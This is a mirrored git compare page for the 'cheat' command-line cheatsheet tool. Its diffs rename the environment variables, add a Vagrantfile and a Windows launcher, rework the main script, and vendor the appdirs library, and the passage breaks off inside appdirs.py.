mirror of
https://github.com/cheat/cheat.git
synced 2025-09-01 09:38:29 +02:00
Compare commits
87 Commits
2.4.0
...
cheat-pyth
Author | SHA1 | Date | |
---|---|---|---|
307c4e6ad6 | |||
1333703a49 | |||
184c200936 | |||
f1837b4c59 | |||
77d0f6d9a0 | |||
5b2518b3fe | |||
60bf61c82f | |||
b1dabec129 | |||
d10290541d | |||
12e8059025 | |||
ea07b6ad0e | |||
c50b236b80 | |||
42a39449b3 | |||
087a076f74 | |||
a15ea7fc3e | |||
f33e6cd602 | |||
95f648cc2d | |||
0db660347b | |||
432461a075 | |||
93df3b3f20 | |||
c548ded02d | |||
4c12d66546 | |||
6ce53370e7 | |||
bde74c701f | |||
fdc414ede3 | |||
5c23f374e4 | |||
c1fceb5f0d | |||
d0faf1a3e3 | |||
fdddedb8bd | |||
5487314676 | |||
ec360ccddd | |||
bb7dfd1028 | |||
b348724082 | |||
5053f07fd8 | |||
f692c8e1d8 | |||
89bb9aaf13 | |||
574deeabc0 | |||
482161f8e9 | |||
4dd55105d2 | |||
6148d64599 | |||
cde8bcaa1d | |||
fcb82778e4 | |||
da92421948 | |||
d6c7863573 | |||
5812bca6b7 | |||
074dba6e99 | |||
9d1dd15387 | |||
caf355f142 | |||
2728ce4757 | |||
6ae76799f7 | |||
0b523a769f | |||
f29cf03b68 | |||
4347114e19 | |||
edc67e7819 | |||
aa33a36491 | |||
8aac10dd8b | |||
9931b78c5f | |||
a37577ee85 | |||
3ad923eff0 | |||
ba47dc2cbc | |||
df21731c02 | |||
a657699a24 | |||
5793c1845a | |||
e2b5728283 | |||
d61e4e7c34 | |||
145a81dcd6 | |||
7c4fc54681 | |||
878d7e7e1b | |||
928637c9db | |||
ab87bb11c4 | |||
8f757d7735 | |||
c922ef4c8d | |||
574a7ec3c9 | |||
5ae49228b7 | |||
09acdf1a69 | |||
9ea60d12ff | |||
f7d747e101 | |||
3b207b4d51 | |||
5e1d3abce8 | |||
ad25e16dc6 | |||
92c07c0137 | |||
7e35263e90 | |||
b377984b59 | |||
e319332138 | |||
13c0ea7525 | |||
9c53e2ba10 | |||
d048ea5a10 |
2
.gitignore
vendored
2
.gitignore
vendored
@ -1,5 +1,7 @@
|
|||||||
|
*.log
|
||||||
*.pyc
|
*.pyc
|
||||||
.env
|
.env
|
||||||
|
.vagrant
|
||||||
MANIFEST
|
MANIFEST
|
||||||
build
|
build
|
||||||
cheat.egg-info
|
cheat.egg-info
|
||||||
|
40
README.md
40
README.md
@ -50,9 +50,12 @@ Installing
|
|||||||
It is recommended to install `cheat` with `pip`:
|
It is recommended to install `cheat` with `pip`:
|
||||||
|
|
||||||
```sh
|
```sh
|
||||||
[sudo] pip install cheat
|
pip install cheat --user
|
||||||
```
|
```
|
||||||
|
|
||||||
|
(You must ensure that the `Location` identified by `pip show cheat` exists on
|
||||||
|
your `PATH`.)
|
||||||
|
|
||||||
[Other installation methods are available][installing].
|
[Other installation methods are available][installing].
|
||||||
|
|
||||||
|
|
||||||
@ -83,41 +86,48 @@ with your [dotfiles][].
|
|||||||
Configuring
|
Configuring
|
||||||
-----------
|
-----------
|
||||||
|
|
||||||
### Setting a DEFAULT_CHEAT_DIR ###
|
### Setting a CHEAT_USER_DIR ###
|
||||||
Personal cheatsheets are saved in the `~/.cheat` directory by default, but you
|
Personal cheatsheets are saved in the `~/.cheat` directory by default, but you
|
||||||
can specify a different default by exporting a `DEFAULT_CHEAT_DIR` environment
|
can specify a different default by exporting a `CHEAT_USER_DIR` environment
|
||||||
variable:
|
variable:
|
||||||
|
|
||||||
```sh
|
```sh
|
||||||
export DEFAULT_CHEAT_DIR='/path/to/my/cheats'
|
export CHEAT_USER_DIR='/path/to/my/cheats'
|
||||||
```
|
```
|
||||||
|
|
||||||
### Setting a CHEATPATH ###
|
### Setting a CHEAT_PATH ###
|
||||||
You can additionally instruct `cheat` to look for cheatsheets in other
|
You can additionally instruct `cheat` to look for cheatsheets in other
|
||||||
directories by exporting a `CHEATPATH` environment variable:
|
directories by exporting a `CHEAT_PATH` environment variable:
|
||||||
|
|
||||||
```sh
|
```sh
|
||||||
export CHEATPATH='/path/to/my/cheats'
|
export CHEAT_PATH='/path/to/my/cheats'
|
||||||
```
|
```
|
||||||
|
|
||||||
You may, of course, append multiple directories to your `CHEATPATH`:
|
You may, of course, append multiple directories to your `CHEAT_PATH`:
|
||||||
|
|
||||||
```sh
|
```sh
|
||||||
export CHEATPATH="$CHEATPATH:/path/to/more/cheats"
|
export CHEAT_PATH="$CHEAT_PATH:/path/to/more/cheats"
|
||||||
```
|
```
|
||||||
|
|
||||||
You may view which directories are on your `CHEATPATH` with `cheat -d`.
|
You may view which directories are on your `CHEAT_PATH` with `cheat -d`.
|
||||||
|
|
||||||
### Enabling Syntax Highlighting ###
|
### Enabling Syntax Highlighting ###
|
||||||
`cheat` can optionally apply syntax highlighting to your cheatsheets. To
|
`cheat` can optionally apply syntax highlighting to your cheatsheets. To
|
||||||
enable syntax highlighting, export a `CHEATCOLORS` environment variable:
|
enable syntax highlighting, export a `CHEAT_COLORS` environment variable:
|
||||||
|
|
||||||
```sh
|
```sh
|
||||||
export CHEATCOLORS=true
|
export CHEAT_COLORS=true
|
||||||
```
|
```
|
||||||
|
|
||||||
Note that [pygments][] must be installed on your system for this to work.
|
Note that [pygments][] must be installed on your system for this to work.
|
||||||
|
|
||||||
|
`cheat` ships with both light and dark colorschemes to support terminals with
|
||||||
|
different background colors. A colorscheme may be selected via the
|
||||||
|
`CHEAT_COLORSCHEME` envvar:
|
||||||
|
|
||||||
|
```sh
|
||||||
|
export CHEAT_COLORSCHEME=light # must be 'light' (default) or 'dark'
|
||||||
|
```
|
||||||
|
|
||||||
#### Specifying a Syntax Highlighter ####
|
#### Specifying a Syntax Highlighter ####
|
||||||
You may manually specify which syntax highlighter to use for each cheatsheet by
|
You may manually specify which syntax highlighter to use for each cheatsheet by
|
||||||
@ -161,9 +171,9 @@ See Also:
|
|||||||
- [Related Projects][related-projects]
|
- [Related Projects][related-projects]
|
||||||
|
|
||||||
|
|
||||||
[autocompletion]: https://github.com/chrisallenlane/cheat/wiki/Enabling-Command-line-Autocompletion
|
[autocompletion]: https://github.com/cheat/cheat/wiki/Enabling-Command-line-Autocompletion
|
||||||
[dotfiles]: http://dotfiles.github.io/
|
[dotfiles]: http://dotfiles.github.io/
|
||||||
[gfm]: https://help.github.com/articles/creating-and-highlighting-code-blocks/
|
[gfm]: https://help.github.com/articles/creating-and-highlighting-code-blocks/
|
||||||
[installing]: https://github.com/chrisallenlane/cheat/wiki/Installing
|
[installing]: https://github.com/cheat/cheat/wiki/Installing
|
||||||
[pygments]: http://pygments.org/
|
[pygments]: http://pygments.org/
|
||||||
[related-projects]: https://github.com/chrisallenlane/cheat/wiki/Related-Projects
|
[related-projects]: https://github.com/cheat/cheat/wiki/Related-Projects
|
||||||
|
20
Vagrantfile
vendored
Normal file
20
Vagrantfile
vendored
Normal file
@ -0,0 +1,20 @@
|
|||||||
|
# -*- mode: ruby -*-
|
||||||
|
# vi: set ft=ruby :
|
||||||
|
|
||||||
|
Vagrant.configure("2") do |config|
|
||||||
|
config.vm.box = "ubuntu/bionic64"
|
||||||
|
|
||||||
|
config.vm.provider "virtualbox" do |vb|
|
||||||
|
vb.memory = "512"
|
||||||
|
end
|
||||||
|
|
||||||
|
config.vm.provision "shell", privileged: false, inline: <<-SHELL
|
||||||
|
sudo apt-get update
|
||||||
|
sudo apt-get install -y python-pip
|
||||||
|
sudo -H pip install flake8
|
||||||
|
pip install --user docopt pygments termcolor
|
||||||
|
cd /vagrant/ && python setup.py install --user
|
||||||
|
echo 'export PATH=$PATH:/home/vagrant/.local/bin' >> /home/vagrant/.bashrc
|
||||||
|
SHELL
|
||||||
|
|
||||||
|
end
|
54
bin/cheat
54
bin/cheat
@ -13,7 +13,7 @@ Usage:
|
|||||||
cheat -v
|
cheat -v
|
||||||
|
|
||||||
Options:
|
Options:
|
||||||
-d --directories List directories on CHEATPATH
|
-d --directories List directories on $CHEAT_PATH
|
||||||
-e --edit Edit cheatsheet
|
-e --edit Edit cheatsheet
|
||||||
-l --list List cheatsheets
|
-l --list List cheatsheets
|
||||||
-s --search Search cheatsheets for <keyword>
|
-s --search Search cheatsheets for <keyword>
|
||||||
@ -36,27 +36,57 @@ Examples:
|
|||||||
|
|
||||||
# require the dependencies
|
# require the dependencies
|
||||||
from __future__ import print_function
|
from __future__ import print_function
|
||||||
from cheat.sheets import Sheets
|
from cheat.colorize import Colorize
|
||||||
from cheat.sheet import Sheet
|
|
||||||
from cheat.utils import Utils
|
|
||||||
from cheat.configuration import Configuration
|
from cheat.configuration import Configuration
|
||||||
|
from cheat.sheet import Sheet
|
||||||
|
from cheat.sheets import Sheets
|
||||||
|
from cheat.utils import Utils
|
||||||
from docopt import docopt
|
from docopt import docopt
|
||||||
import os
|
import os
|
||||||
|
|
||||||
|
|
||||||
if __name__ == '__main__':
|
if __name__ == '__main__':
|
||||||
|
|
||||||
# parse the command-line options
|
# parse the command-line options
|
||||||
options = docopt(__doc__, version='cheat 2.4.0')
|
options = docopt(__doc__, version='cheat 2.5.1')
|
||||||
|
|
||||||
|
# initialize and validate configs
|
||||||
config = Configuration()
|
config = Configuration()
|
||||||
|
config.validate()
|
||||||
|
|
||||||
|
# create the CHEAT_USER_DIR if it does not exist
|
||||||
|
if not os.path.isdir(config.cheat_user_dir):
|
||||||
|
try:
|
||||||
|
os.mkdir(config.cheat_user_dir)
|
||||||
|
|
||||||
|
except OSError:
|
||||||
|
Utils.die("%s %s %s" % (
|
||||||
|
'Could not create CHEAT_USER_DIR (',
|
||||||
|
config.cheat_user_dir,
|
||||||
|
')')
|
||||||
|
)
|
||||||
|
|
||||||
|
# assert that the CHEAT_USER_DIR is readable and writable
|
||||||
|
if not os.access(config.cheat_user_dir, os.R_OK):
|
||||||
|
Utils.die("%s %s %s" % (
|
||||||
|
'The CHEAT_USER_DIR (',
|
||||||
|
config.cheat_user_dir,
|
||||||
|
') is not readable')
|
||||||
|
)
|
||||||
|
if not os.access(config.cheat_user_dir, os.W_OK):
|
||||||
|
Utils.die("%s %s %s" % (
|
||||||
|
'The CHEAT_USER_DIR (',
|
||||||
|
config.cheat_user_dir,
|
||||||
|
') is not writeable')
|
||||||
|
)
|
||||||
|
|
||||||
|
# bootsrap
|
||||||
sheets = Sheets(config)
|
sheets = Sheets(config)
|
||||||
utils = Utils(config)
|
sheet = Sheet(config, sheets)
|
||||||
sheet = Sheet(sheets, utils)
|
colorize = Colorize(config)
|
||||||
|
|
||||||
# list directories
|
# list directories
|
||||||
if options['--directories']:
|
if options['--directories']:
|
||||||
print("\n".join(sheets.paths()))
|
print("\n".join(sheets.directories()))
|
||||||
|
|
||||||
# list cheatsheets
|
# list cheatsheets
|
||||||
elif options['--list']:
|
elif options['--list']:
|
||||||
@ -64,12 +94,12 @@ if __name__ == '__main__':
|
|||||||
|
|
||||||
# create/edit cheatsheet
|
# create/edit cheatsheet
|
||||||
elif options['--edit']:
|
elif options['--edit']:
|
||||||
sheet.create_or_edit(options['<cheatsheet>'])
|
sheet.edit(options['<cheatsheet>'])
|
||||||
|
|
||||||
# search among the cheatsheets
|
# search among the cheatsheets
|
||||||
elif options['--search']:
|
elif options['--search']:
|
||||||
print(utils.colorize(sheets.search(options['<keyword>'])), end="")
|
print(colorize.syntax(sheets.search(options['<keyword>'])), end="")
|
||||||
|
|
||||||
# print the cheatsheet
|
# print the cheatsheet
|
||||||
else:
|
else:
|
||||||
print(utils.colorize(sheet.read(options['<cheatsheet>'])), end="")
|
print(colorize.syntax(sheet.read(options['<cheatsheet>'])), end="")
|
||||||
|
8
bin/cheat.bat
Normal file
8
bin/cheat.bat
Normal file
@ -0,0 +1,8 @@
|
|||||||
|
@echo OFF
|
||||||
|
|
||||||
|
if not defined CHEAT_EDITOR if not defined EDITOR if not defined VISUAL (
|
||||||
|
set CHEAT_EDITOR=write
|
||||||
|
)
|
||||||
|
|
||||||
|
REM %~dp0 is black magic for getting directory of script
|
||||||
|
python %~dp0cheat %*
|
@ -1,4 +0,0 @@
|
|||||||
from . import sheet
|
|
||||||
from . import sheets
|
|
||||||
from . import utils
|
|
||||||
from . import configuration
|
|
618
cheat/appdirs.py
Normal file
618
cheat/appdirs.py
Normal file
@ -0,0 +1,618 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
# -*- coding: utf-8 -*-
|
||||||
|
# Copyright (c) 2005-2010 ActiveState Software Inc.
|
||||||
|
# Copyright (c) 2013 Eddy Petrișor
|
||||||
|
|
||||||
|
"""Utilities for determining application-specific dirs.
|
||||||
|
|
||||||
|
See <https://github.com/ActiveState/appdirs> for details and usage.
|
||||||
|
"""
|
||||||
|
# Dev Notes:
|
||||||
|
# - MSDN on where to store app data files:
|
||||||
|
# http://support.microsoft.com/default.aspx?scid=kb;en-us;310294#XSLTH3194121123120121120120
|
||||||
|
# - Mac OS X: http://developer.apple.com/documentation/MacOSX/Conceptual/BPFileSystem/index.html
|
||||||
|
# - XDG spec for Un*x: https://standards.freedesktop.org/basedir-spec/basedir-spec-latest.html
|
||||||
|
|
||||||
|
__version__ = "1.4.4"
|
||||||
|
__version_info__ = tuple(int(segment) for segment in __version__.split("."))
|
||||||
|
|
||||||
|
|
||||||
|
import sys
|
||||||
|
import os
|
||||||
|
|
||||||
|
PY3 = sys.version_info[0] == 3
|
||||||
|
|
||||||
|
if PY3:
|
||||||
|
unicode = str
|
||||||
|
|
||||||
|
if sys.platform.startswith('java'):
|
||||||
|
import platform
|
||||||
|
os_name = platform.java_ver()[3][0]
|
||||||
|
if os_name.startswith('Windows'): # "Windows XP", "Windows 7", etc.
|
||||||
|
system = 'win32'
|
||||||
|
elif os_name.startswith('Mac'): # "Mac OS X", etc.
|
||||||
|
system = 'darwin'
|
||||||
|
else: # "Linux", "SunOS", "FreeBSD", etc.
|
||||||
|
# Setting this to "linux2" is not ideal, but only Windows or Mac
|
||||||
|
# are actually checked for and the rest of the module expects
|
||||||
|
# *sys.platform* style strings.
|
||||||
|
system = 'linux2'
|
||||||
|
else:
|
||||||
|
system = sys.platform
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
def user_data_dir(appname=None, appauthor=None, version=None, roaming=False):
|
||||||
|
r"""Return full path to the user-specific data dir for this application.
|
||||||
|
|
||||||
|
"appname" is the name of application.
|
||||||
|
If None, just the system directory is returned.
|
||||||
|
"appauthor" (only used on Windows) is the name of the
|
||||||
|
appauthor or distributing body for this application. Typically
|
||||||
|
it is the owning company name. This falls back to appname. You may
|
||||||
|
pass False to disable it.
|
||||||
|
"version" is an optional version path element to append to the
|
||||||
|
path. You might want to use this if you want multiple versions
|
||||||
|
of your app to be able to run independently. If used, this
|
||||||
|
would typically be "<major>.<minor>".
|
||||||
|
Only applied when appname is present.
|
||||||
|
"roaming" (boolean, default False) can be set True to use the Windows
|
||||||
|
roaming appdata directory. That means that for users on a Windows
|
||||||
|
network setup for roaming profiles, this user data will be
|
||||||
|
sync'd on login. See
|
||||||
|
<http://technet.microsoft.com/en-us/library/cc766489(WS.10).aspx>
|
||||||
|
for a discussion of issues.
|
||||||
|
|
||||||
|
Typical user data directories are:
|
||||||
|
Mac OS X: ~/Library/Application Support/<AppName>
|
||||||
|
Unix: ~/.local/share/<AppName> # or in $XDG_DATA_HOME, if defined
|
||||||
|
Win XP (not roaming): C:\Documents and Settings\<username>\Application Data\<AppAuthor>\<AppName>
|
||||||
|
Win XP (roaming): C:\Documents and Settings\<username>\Local Settings\Application Data\<AppAuthor>\<AppName>
|
||||||
|
Win 7 (not roaming): C:\Users\<username>\AppData\Local\<AppAuthor>\<AppName>
|
||||||
|
Win 7 (roaming): C:\Users\<username>\AppData\Roaming\<AppAuthor>\<AppName>
|
||||||
|
|
||||||
|
For Unix, we follow the XDG spec and support $XDG_DATA_HOME.
|
||||||
|
That means, by default "~/.local/share/<AppName>".
|
||||||
|
"""
|
||||||
|
if system == "win32":
|
||||||
|
if appauthor is None:
|
||||||
|
appauthor = appname
|
||||||
|
const = roaming and "CSIDL_APPDATA" or "CSIDL_LOCAL_APPDATA"
|
||||||
|
path = os.path.normpath(_get_win_folder(const))
|
||||||
|
if appname:
|
||||||
|
if appauthor is not False:
|
||||||
|
path = os.path.join(path, appauthor, appname)
|
||||||
|
else:
|
||||||
|
path = os.path.join(path, appname)
|
||||||
|
elif system == 'darwin':
|
||||||
|
path = os.path.expanduser('~/Library/Application Support/')
|
||||||
|
if appname:
|
||||||
|
path = os.path.join(path, appname)
|
||||||
|
else:
|
||||||
|
path = os.getenv('XDG_DATA_HOME', os.path.expanduser("~/.local/share"))
|
||||||
|
if appname:
|
||||||
|
path = os.path.join(path, appname)
|
||||||
|
if appname and version:
|
||||||
|
path = os.path.join(path, version)
|
||||||
|
return path
|
||||||
|
|
||||||
|
|
||||||
|
def site_data_dir(appname=None, appauthor=None, version=None, multipath=False):
|
||||||
|
r"""Return full path to the user-shared data dir for this application.
|
||||||
|
|
||||||
|
"appname" is the name of application.
|
||||||
|
If None, just the system directory is returned.
|
||||||
|
"appauthor" (only used on Windows) is the name of the
|
||||||
|
appauthor or distributing body for this application. Typically
|
||||||
|
it is the owning company name. This falls back to appname. You may
|
||||||
|
pass False to disable it.
|
||||||
|
"version" is an optional version path element to append to the
|
||||||
|
path. You might want to use this if you want multiple versions
|
||||||
|
of your app to be able to run independently. If used, this
|
||||||
|
would typically be "<major>.<minor>".
|
||||||
|
Only applied when appname is present.
|
||||||
|
"multipath" is an optional parameter only applicable to *nix
|
||||||
|
which indicates that the entire list of data dirs should be
|
||||||
|
returned. By default, the first item from XDG_DATA_DIRS is
|
||||||
|
returned, or '/usr/local/share/<AppName>',
|
||||||
|
if XDG_DATA_DIRS is not set
|
||||||
|
|
||||||
|
Typical site data directories are:
|
||||||
|
Mac OS X: /Library/Application Support/<AppName>
|
||||||
|
Unix: /usr/local/share/<AppName> or /usr/share/<AppName>
|
||||||
|
Win XP: C:\Documents and Settings\All Users\Application Data\<AppAuthor>\<AppName>
|
||||||
|
Vista: (Fail! "C:\ProgramData" is a hidden *system* directory on Vista.)
|
||||||
|
Win 7: C:\ProgramData\<AppAuthor>\<AppName> # Hidden, but writeable on Win 7.
|
||||||
|
|
||||||
|
For Unix, this is using the $XDG_DATA_DIRS[0] default.
|
||||||
|
|
||||||
|
WARNING: Do not use this on Windows. See the Vista-Fail note above for why.
|
||||||
|
"""
|
||||||
|
if system == "win32":
|
||||||
|
if appauthor is None:
|
||||||
|
appauthor = appname
|
||||||
|
path = os.path.normpath(_get_win_folder("CSIDL_COMMON_APPDATA"))
|
||||||
|
if appname:
|
||||||
|
if appauthor is not False:
|
||||||
|
path = os.path.join(path, appauthor, appname)
|
||||||
|
else:
|
||||||
|
path = os.path.join(path, appname)
|
||||||
|
elif system == 'darwin':
|
||||||
|
path = os.path.expanduser('/Library/Application Support')
|
||||||
|
if appname:
|
||||||
|
path = os.path.join(path, appname)
|
||||||
|
else:
|
||||||
|
# XDG default for $XDG_DATA_DIRS
|
||||||
|
# only first, if multipath is False
|
||||||
|
path = os.getenv('XDG_DATA_DIRS',
|
||||||
|
os.pathsep.join(['/usr/local/share', '/usr/share']))
|
||||||
|
pathlist = [os.path.expanduser(x.rstrip(os.sep)) for x in path.split(os.pathsep)]
|
||||||
|
if appname:
|
||||||
|
if version:
|
||||||
|
appname = os.path.join(appname, version)
|
||||||
|
pathlist = [os.sep.join([x, appname]) for x in pathlist]
|
||||||
|
|
||||||
|
if multipath:
|
||||||
|
path = os.pathsep.join(pathlist)
|
||||||
|
else:
|
||||||
|
path = pathlist[0]
|
||||||
|
return path
|
||||||
|
|
||||||
|
if appname and version:
|
||||||
|
path = os.path.join(path, version)
|
||||||
|
return path
|
||||||
|
|
||||||
|
|
||||||
|
def user_config_dir(appname=None, appauthor=None, version=None, roaming=False):
|
||||||
|
r"""Return full path to the user-specific config dir for this application.
|
||||||
|
|
||||||
|
"appname" is the name of application.
|
||||||
|
If None, just the system directory is returned.
|
||||||
|
"appauthor" (only used on Windows) is the name of the
|
||||||
|
appauthor or distributing body for this application. Typically
|
||||||
|
it is the owning company name. This falls back to appname. You may
|
||||||
|
pass False to disable it.
|
||||||
|
"version" is an optional version path element to append to the
|
||||||
|
path. You might want to use this if you want multiple versions
|
||||||
|
of your app to be able to run independently. If used, this
|
||||||
|
would typically be "<major>.<minor>".
|
||||||
|
Only applied when appname is present.
|
||||||
|
"roaming" (boolean, default False) can be set True to use the Windows
|
||||||
|
roaming appdata directory. That means that for users on a Windows
|
||||||
|
network setup for roaming profiles, this user data will be
|
||||||
|
sync'd on login. See
|
||||||
|
<http://technet.microsoft.com/en-us/library/cc766489(WS.10).aspx>
|
||||||
|
for a discussion of issues.
|
||||||
|
|
||||||
|
Typical user config directories are:
|
||||||
|
Mac OS X: ~/Library/Preferences/<AppName>
|
||||||
|
Unix: ~/.config/<AppName> # or in $XDG_CONFIG_HOME, if defined
|
||||||
|
Win *: same as user_data_dir
|
||||||
|
|
||||||
|
For Unix, we follow the XDG spec and support $XDG_CONFIG_HOME.
|
||||||
|
That means, by default "~/.config/<AppName>".
|
||||||
|
"""
|
||||||
|
if system == "win32":
|
||||||
|
path = user_data_dir(appname, appauthor, None, roaming)
|
||||||
|
elif system == 'darwin':
|
||||||
|
path = os.path.expanduser('~/Library/Preferences/')
|
||||||
|
if appname:
|
||||||
|
path = os.path.join(path, appname)
|
||||||
|
else:
|
||||||
|
path = os.getenv('XDG_CONFIG_HOME', os.path.expanduser("~/.config"))
|
||||||
|
if appname:
|
||||||
|
path = os.path.join(path, appname)
|
||||||
|
if appname and version:
|
||||||
|
path = os.path.join(path, version)
|
||||||
|
return path
|
||||||
|
|
||||||
|
|
||||||
|
def site_config_dir(appname=None, appauthor=None, version=None, multipath=False):
|
||||||
|
r"""Return full path to the user-shared data dir for this application.
|
||||||
|
|
||||||
|
"appname" is the name of application.
|
||||||
|
If None, just the system directory is returned.
|
||||||
|
"appauthor" (only used on Windows) is the name of the
|
||||||
|
appauthor or distributing body for this application. Typically
|
||||||
|
it is the owning company name. This falls back to appname. You may
|
||||||
|
pass False to disable it.
|
||||||
|
"version" is an optional version path element to append to the
|
||||||
|
path. You might want to use this if you want multiple versions
|
||||||
|
of your app to be able to run independently. If used, this
|
||||||
|
would typically be "<major>.<minor>".
|
||||||
|
Only applied when appname is present.
|
||||||
|
"multipath" is an optional parameter only applicable to *nix
|
||||||
|
which indicates that the entire list of config dirs should be
|
||||||
|
returned. By default, the first item from XDG_CONFIG_DIRS is
|
||||||
|
returned, or '/etc/xdg/<AppName>', if XDG_CONFIG_DIRS is not set
|
||||||
|
|
||||||
|
Typical site config directories are:
|
||||||
|
Mac OS X: same as site_data_dir
|
||||||
|
Unix: /etc/xdg/<AppName> or $XDG_CONFIG_DIRS[i]/<AppName> for each value in
|
||||||
|
$XDG_CONFIG_DIRS
|
||||||
|
Win *: same as site_data_dir
|
||||||
|
Vista: (Fail! "C:\ProgramData" is a hidden *system* directory on Vista.)
|
||||||
|
|
||||||
|
For Unix, this is using the $XDG_CONFIG_DIRS[0] default, if multipath=False
|
||||||
|
|
||||||
|
WARNING: Do not use this on Windows. See the Vista-Fail note above for why.
|
||||||
|
"""
|
||||||
|
if system == 'win32':
|
||||||
|
path = site_data_dir(appname, appauthor)
|
||||||
|
if appname and version:
|
||||||
|
path = os.path.join(path, version)
|
||||||
|
elif system == 'darwin':
|
||||||
|
path = os.path.expanduser('/Library/Preferences')
|
||||||
|
if appname:
|
||||||
|
path = os.path.join(path, appname)
|
||||||
|
elif system == 'linux':
|
||||||
|
path = os.path.join('/etc/', appname)
|
||||||
|
else:
|
||||||
|
# XDG default for $XDG_CONFIG_DIRS
|
||||||
|
# only first, if multipath is False
|
||||||
|
path = os.getenv('XDG_CONFIG_DIRS', '/etc/xdg')
|
||||||
|
pathlist = [os.path.expanduser(x.rstrip(os.sep)) for x in path.split(os.pathsep)]
|
||||||
|
if appname:
|
||||||
|
if version:
|
||||||
|
appname = os.path.join(appname, version)
|
||||||
|
pathlist = [os.sep.join([x, appname]) for x in pathlist]
|
||||||
|
|
||||||
|
if multipath:
|
||||||
|
path = os.pathsep.join(pathlist)
|
||||||
|
else:
|
||||||
|
path = pathlist[0]
|
||||||
|
return path
|
||||||
|
|
||||||
|
|
||||||
|
def user_cache_dir(appname=None, appauthor=None, version=None, opinion=True):
|
||||||
|
r"""Return full path to the user-specific cache dir for this application.
|
||||||
|
|
||||||
|
"appname" is the name of application.
|
||||||
|
If None, just the system directory is returned.
|
||||||
|
"appauthor" (only used on Windows) is the name of the
|
||||||
|
appauthor or distributing body for this application. Typically
|
||||||
|
it is the owning company name. This falls back to appname. You may
|
||||||
|
pass False to disable it.
|
||||||
|
"version" is an optional version path element to append to the
|
||||||
|
path. You might want to use this if you want multiple versions
|
||||||
|
of your app to be able to run independently. If used, this
|
||||||
|
would typically be "<major>.<minor>".
|
||||||
|
Only applied when appname is present.
|
||||||
|
"opinion" (boolean) can be False to disable the appending of
|
||||||
|
"Cache" to the base app data dir for Windows. See
|
||||||
|
discussion below.
|
||||||
|
|
||||||
|
Typical user cache directories are:
|
||||||
|
Mac OS X: ~/Library/Caches/<AppName>
|
||||||
|
Unix: ~/.cache/<AppName> (XDG default)
|
||||||
|
Win XP: C:\Documents and Settings\<username>\Local Settings\Application Data\<AppAuthor>\<AppName>\Cache
|
||||||
|
Vista: C:\Users\<username>\AppData\Local\<AppAuthor>\<AppName>\Cache
|
||||||
|
|
||||||
|
On Windows the only suggestion in the MSDN docs is that local settings go in
|
||||||
|
the `CSIDL_LOCAL_APPDATA` directory. This is identical to the non-roaming
|
||||||
|
app data dir (the default returned by `user_data_dir` above). Apps typically
|
||||||
|
put cache data somewhere *under* the given dir here. Some examples:
|
||||||
|
...\Mozilla\Firefox\Profiles\<ProfileName>\Cache
|
||||||
|
...\Acme\SuperApp\Cache\1.0
|
||||||
|
OPINION: This function appends "Cache" to the `CSIDL_LOCAL_APPDATA` value.
|
||||||
|
This can be disabled with the `opinion=False` option.
|
||||||
|
"""
|
||||||
|
if system == "win32":
|
||||||
|
if appauthor is None:
|
||||||
|
appauthor = appname
|
||||||
|
path = os.path.normpath(_get_win_folder("CSIDL_LOCAL_APPDATA"))
|
||||||
|
if appname:
|
||||||
|
if appauthor is not False:
|
||||||
|
path = os.path.join(path, appauthor, appname)
|
||||||
|
else:
|
||||||
|
path = os.path.join(path, appname)
|
||||||
|
if opinion:
|
||||||
|
path = os.path.join(path, "Cache")
|
||||||
|
elif system == 'darwin':
|
||||||
|
path = os.path.expanduser('~/Library/Caches')
|
||||||
|
if appname:
|
||||||
|
path = os.path.join(path, appname)
|
||||||
|
else:
|
||||||
|
path = os.getenv('XDG_CACHE_HOME', os.path.expanduser('~/.cache'))
|
||||||
|
if appname:
|
||||||
|
path = os.path.join(path, appname)
|
||||||
|
if appname and version:
|
||||||
|
path = os.path.join(path, version)
|
||||||
|
return path
|
||||||
|
|
||||||
|
|
||||||
|
def user_state_dir(appname=None, appauthor=None, version=None, roaming=False):
|
||||||
|
r"""Return full path to the user-specific state dir for this application.
|
||||||
|
|
||||||
|
"appname" is the name of application.
|
||||||
|
If None, just the system directory is returned.
|
||||||
|
"appauthor" (only used on Windows) is the name of the
|
||||||
|
appauthor or distributing body for this application. Typically
|
||||||
|
it is the owning company name. This falls back to appname. You may
|
||||||
|
pass False to disable it.
|
||||||
|
"version" is an optional version path element to append to the
|
||||||
|
path. You might want to use this if you want multiple versions
|
||||||
|
of your app to be able to run independently. If used, this
|
||||||
|
would typically be "<major>.<minor>".
|
||||||
|
Only applied when appname is present.
|
||||||
|
"roaming" (boolean, default False) can be set True to use the Windows
|
||||||
|
roaming appdata directory. That means that for users on a Windows
|
||||||
|
network setup for roaming profiles, this user data will be
|
||||||
|
sync'd on login. See
|
||||||
|
<http://technet.microsoft.com/en-us/library/cc766489(WS.10).aspx>
|
||||||
|
for a discussion of issues.
|
||||||
|
|
||||||
|
Typical user state directories are:
|
||||||
|
Mac OS X: same as user_data_dir
|
||||||
|
Unix: ~/.local/state/<AppName> # or in $XDG_STATE_HOME, if defined
|
||||||
|
Win *: same as user_data_dir
|
||||||
|
|
||||||
|
For Unix, we follow this Debian proposal <https://wiki.debian.org/XDGBaseDirectorySpecification#state>
|
||||||
|
to extend the XDG spec and support $XDG_STATE_HOME.
|
||||||
|
|
||||||
|
That means, by default "~/.local/state/<AppName>".
|
||||||
|
"""
|
||||||
|
if system in ["win32", "darwin"]:
|
||||||
|
path = user_data_dir(appname, appauthor, None, roaming)
|
||||||
|
else:
|
||||||
|
path = os.getenv('XDG_STATE_HOME', os.path.expanduser("~/.local/state"))
|
||||||
|
if appname:
|
||||||
|
path = os.path.join(path, appname)
|
||||||
|
if appname and version:
|
||||||
|
path = os.path.join(path, version)
|
||||||
|
return path
|
||||||
|
|
||||||
|
|
||||||
|
def user_log_dir(appname=None, appauthor=None, version=None, opinion=True):
|
||||||
|
r"""Return full path to the user-specific log dir for this application.
|
||||||
|
|
||||||
|
"appname" is the name of application.
|
||||||
|
If None, just the system directory is returned.
|
||||||
|
"appauthor" (only used on Windows) is the name of the
|
||||||
|
appauthor or distributing body for this application. Typically
|
||||||
|
it is the owning company name. This falls back to appname. You may
|
||||||
|
pass False to disable it.
|
||||||
|
"version" is an optional version path element to append to the
|
||||||
|
path. You might want to use this if you want multiple versions
|
||||||
|
of your app to be able to run independently. If used, this
|
||||||
|
would typically be "<major>.<minor>".
|
||||||
|
Only applied when appname is present.
|
||||||
|
"opinion" (boolean) can be False to disable the appending of
|
||||||
|
